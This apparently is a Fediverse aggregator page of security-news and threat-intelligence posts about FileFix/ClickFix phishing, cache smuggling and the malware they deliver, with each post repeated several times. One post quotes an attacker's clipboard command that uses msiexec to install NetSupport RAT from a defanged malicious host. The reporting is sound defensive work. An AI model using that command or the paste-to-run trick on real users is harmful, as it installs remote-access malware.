#filefix — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #filefix, aggregated by home.social.
-
[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов
Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.
https://habr.com/ru/companies/bastion/articles/967312/
#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия
-
[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов
Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.
https://habr.com/ru/companies/bastion/articles/967312/
#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия
-
[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов
Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.
https://habr.com/ru/companies/bastion/articles/967312/
#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия
-
[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов
Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.
https://habr.com/ru/companies/bastion/articles/967312/
#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия
-
PCを乗っとる「ClickFix」攻撃に早くも亜種、「FileFix」にも注意 ~Kasperskyが解説/[Windows]+[R]キーを押さなきゃ大丈夫……なんて安心してると騙される【やじうまの杜】
https://forest.watch.impress.co.jp/docs/serial/yajiuma/2062226.html -
PCを乗っとる「ClickFix」攻撃に早くも亜種、「FileFix」にも注意 ~Kasperskyが解説/[Windows]+[R]キーを押さなきゃ大丈夫……なんて安心してると騙される【やじうまの杜】
https://forest.watch.impress.co.jp/docs/serial/yajiuma/2062226.html -
PCを乗っとる「ClickFix」攻撃に早くも亜種、「FileFix」にも注意 ~Kasperskyが解説/[Windows]+[R]キーを押さなきゃ大丈夫……なんて安心してると騙される【やじうまの杜】
https://forest.watch.impress.co.jp/docs/serial/yajiuma/2062226.html -
FileFix + Cache Smuggling: A New Evasion Combo https://gbhackers.com/filefix-cache-smuggling/ #CyberSecurityNews #cybersecurity #FileFix+
-
FileFix + Cache Smuggling: A New Evasion Combo https://gbhackers.com/filefix-cache-smuggling/ #CyberSecurityNews #cybersecurity #FileFix+
-
FileFix + Cache Smuggling: A New Evasion Combo https://gbhackers.com/filefix-cache-smuggling/ #CyberSecurityNews #cybersecurity #FileFix+
-
FileFix + Cache Smuggling: A New Evasion Combo https://gbhackers.com/filefix-cache-smuggling/ #CyberSecurityNews #cybersecurity #FileFix+
-
One sneaky HTTP header is all it takes—attackers are using FileFix to smuggle malware past top security defenses. How vulnerable is your cache?
https://thedefendopsdiaries.com/cache-smuggling-how-the-filefix-attack-outsmarts-security-defenses/
#cache-smuggling
#filefix-attack
#web-security
#cybersecurity-threats
#http-headers -
One sneaky HTTP header is all it takes—attackers are using FileFix to smuggle malware past top security defenses. How vulnerable is your cache?
https://thedefendopsdiaries.com/cache-smuggling-how-the-filefix-attack-outsmarts-security-defenses/
#cache-smuggling
#filefix-attack
#web-security
#cybersecurity-threats
#http-headers -
One sneaky HTTP header is all it takes—attackers are using FileFix to smuggle malware past top security defenses. How vulnerable is your cache?
https://thedefendopsdiaries.com/cache-smuggling-how-the-filefix-attack-outsmarts-security-defenses/
#cache-smuggling
#filefix-attack
#web-security
#cybersecurity-threats
#http-headers -
One sneaky HTTP header is all it takes—attackers are using FileFix to smuggle malware past top security defenses. How vulnerable is your cache?
https://thedefendopsdiaries.com/cache-smuggling-how-the-filefix-attack-outsmarts-security-defenses/
#cache-smuggling
#filefix-attack
#web-security
#cybersecurity-threats
#http-headers -
FileFix – atak phishingowy wykorzystujący Eksplorator Systemu Windows
Badacze bezpieczeństwa z Acronis Threat Research Unit zaobserwowali nową kampanię phishingową wykorzystującą metodę ataku FileFix. Atak wyróżnia się nietypowym sposobem ukrywania złośliwego oprogramowania – zastosowanie obfuskacji oraz steganografii. FileFix stanowi nowy wariant popularnego wektora ataku ClickFix. Podobnie jak w przypadku tego wektora, celem ataku jest nakłonienie użytkownika do samodzielnego uruchomienia...
#WBiegu #Clickfix #Filefix #Meta #Phishing #Stealc
https://sekurak.pl/filefix-atak-phishingowy-wykorzystujacy-eksplorator-systemu-windows/
-
FileFix – atak phishingowy wykorzystujący Eksplorator Systemu Windows
Badacze bezpieczeństwa z Acronis Threat Research Unit zaobserwowali nową kampanię phishingową wykorzystującą metodę ataku FileFix. Atak wyróżnia się nietypowym sposobem ukrywania złośliwego oprogramowania – zastosowanie obfuskacji oraz steganografii. FileFix stanowi nowy wariant popularnego wektora ataku ClickFix. Podobnie jak w przypadku tego wektora, celem ataku jest nakłonienie użytkownika do samodzielnego uruchomienia...
#WBiegu #Clickfix #Filefix #Meta #Phishing #Stealc
https://sekurak.pl/filefix-atak-phishingowy-wykorzystujacy-eksplorator-systemu-windows/
-
FileFix – atak phishingowy wykorzystujący Eksplorator Systemu Windows
Badacze bezpieczeństwa z Acronis Threat Research Unit zaobserwowali nową kampanię phishingową wykorzystującą metodę ataku FileFix. Atak wyróżnia się nietypowym sposobem ukrywania złośliwego oprogramowania – zastosowanie obfuskacji oraz steganografii. FileFix stanowi nowy wariant popularnego wektora ataku ClickFix. Podobnie jak w przypadku tego wektora, celem ataku jest nakłonienie użytkownika do samodzielnego uruchomienia...
#WBiegu #Clickfix #Filefix #Meta #Phishing #Stealc
https://sekurak.pl/filefix-atak-phishingowy-wykorzystujacy-eksplorator-systemu-windows/
-
FileFix – atak phishingowy wykorzystujący Eksplorator Systemu Windows
Badacze bezpieczeństwa z Acronis Threat Research Unit zaobserwowali nową kampanię phishingową wykorzystującą metodę ataku FileFix. Atak wyróżnia się nietypowym sposobem ukrywania złośliwego oprogramowania – zastosowanie obfuskacji oraz steganografii. FileFix stanowi nowy wariant popularnego wektora ataku ClickFix. Podobnie jak w przypadku tego wektora, celem ataku jest nakłonienie użytkownika do samodzielnego uruchomienia...
#WBiegu #Clickfix #Filefix #Meta #Phishing #Stealc
https://sekurak.pl/filefix-atak-phishingowy-wykorzystujacy-eksplorator-systemu-windows/
-
FileFix – atak phishingowy wykorzystujący Eksplorator Systemu Windows
Badacze bezpieczeństwa z Acronis Threat Research Unit zaobserwowali nową kampanię phishingową wykorzystującą metodę ataku FileFix. Atak wyróżnia się nietypowym sposobem ukrywania złośliwego oprogramowania – zastosowanie obfuskacji oraz steganografii. FileFix stanowi nowy wariant popularnego wektora ataku ClickFix. Podobnie jak w przypadku tego wektora, celem ataku jest nakłonienie użytkownika do samodzielnego uruchomienia...
#WBiegu #Clickfix #Filefix #Meta #Phishing #Stealc
https://sekurak.pl/filefix-atak-phishingowy-wykorzystujacy-eksplorator-systemu-windows/
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
The Register: FileFix attacks use fake Facebook security alerts to trick victims into running infostealers. “An attack called FileFix is masquerading as a Facebook security alert before ultimately dropping the widely used StealC infostealer and malware downloader on Windows machines.”
-
The Register: FileFix attacks use fake Facebook security alerts to trick victims into running infostealers. “An attack called FileFix is masquerading as a Facebook security alert before ultimately dropping the widely used StealC infostealer and malware downloader on Windows machines.”
-
The Register: FileFix attacks use fake Facebook security alerts to trick victims into running infostealers. “An attack called FileFix is masquerading as a Facebook security alert before ultimately dropping the widely used StealC infostealer and malware downloader on Windows machines.”
-
Ongoing FileFix Attack Installs StealC Infostealer Via Fake Facebook Pages https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/ #SocialEngineering #Cybersecurity #PhishingScam #CyberAttack #Infostealer #Security #ClickFix #Facebook #Malware #Captcha #FileFix #Stealc
-
Ongoing FileFix Attack Installs StealC Infostealer Via Fake Facebook Pages https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/ #SocialEngineering #Cybersecurity #PhishingScam #CyberAttack #Infostealer #Security #ClickFix #Facebook #Malware #Captcha #FileFix #Stealc
-
Ongoing FileFix Attack Installs StealC Infostealer Via Fake Facebook Pages https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/ #SocialEngineering #Cybersecurity #PhishingScam #CyberAttack #Infostealer #Security #ClickFix #Facebook #Malware #Captcha #FileFix #Stealc
-
Ongoing FileFix Attack Installs StealC Infostealer Via Fake Facebook Pages https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/ #SocialEngineering #Cybersecurity #PhishingScam #CyberAttack #Infostealer #Security #ClickFix #Facebook #Malware #Captcha #FileFix #Stealc
-
Watch out as hackers are using FileFix phishing with fake Facebook warnings to drop StealC Infostealer, hiding the payload inside images with #steganography.
Read: https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/
-
Watch out as hackers are using FileFix phishing with fake Facebook warnings to drop StealC Infostealer, hiding the payload inside images with #steganography.
Read: https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/
-
Watch out as hackers are using FileFix phishing with fake Facebook warnings to drop StealC Infostealer, hiding the payload inside images with #steganography.
Read: https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/
-
Watch out as hackers are using FileFix phishing with fake Facebook warnings to drop StealC Infostealer, hiding the payload inside images with #steganography.
Read: https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/
-
Watch out as hackers are using FileFix phishing with fake Facebook warnings to drop StealC Infostealer, hiding the payload inside images with #steganography.
Read: https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
From Check Point Research:
FileFix
Check Point Research uncovered that FileFix, a social engineering method that opens File Explorer from a malicious site and copies a hidden PowerShell command to the clipboard, is actively tested by threat actors. Pasting it into the address bar executes malware without exploiting software flaws.
-
From Check Point Research:
FileFix
Check Point Research uncovered that FileFix, a social engineering method that opens File Explorer from a malicious site and copies a hidden PowerShell command to the clipboard, is actively tested by threat actors. Pasting it into the address bar executes malware without exploiting software flaws.
-
From Check Point Research:
FileFix
Check Point Research uncovered that FileFix, a social engineering method that opens File Explorer from a malicious site and copies a hidden PowerShell command to the clipboard, is actively tested by threat actors. Pasting it into the address bar executes malware without exploiting software flaws.
-
From Check Point Research:
FileFix
Check Point Research uncovered that FileFix, a social engineering method that opens File Explorer from a malicious site and copies a hidden PowerShell command to the clipboard, is actively tested by threat actors. Pasting it into the address bar executes malware without exploiting software flaws.
-
New Interlock RAT Variant Distributed via FileFix Attacks https://www.securityweek.com/new-interlock-rat-variant-distributed-via-filefix-attacks/ #Malware&Threats #Ransomware #InterLock #ClickFix #FileFix #RAT
-
New Interlock RAT Variant Distributed via FileFix Attacks https://www.securityweek.com/new-interlock-rat-variant-distributed-via-filefix-attacks/ #Malware&Threats #Ransomware #InterLock #ClickFix #FileFix #RAT
-
New Interlock RAT Variant Distributed via FileFix Attacks https://www.securityweek.com/new-interlock-rat-variant-distributed-via-filefix-attacks/ #Malware&Threats #Ransomware #InterLock #ClickFix #FileFix #RAT
-
New Interlock RAT Variant Distributed via FileFix Attacks https://www.securityweek.com/new-interlock-rat-variant-distributed-via-filefix-attacks/ #Malware&Threats #Ransomware #InterLock #ClickFix #FileFix #RAT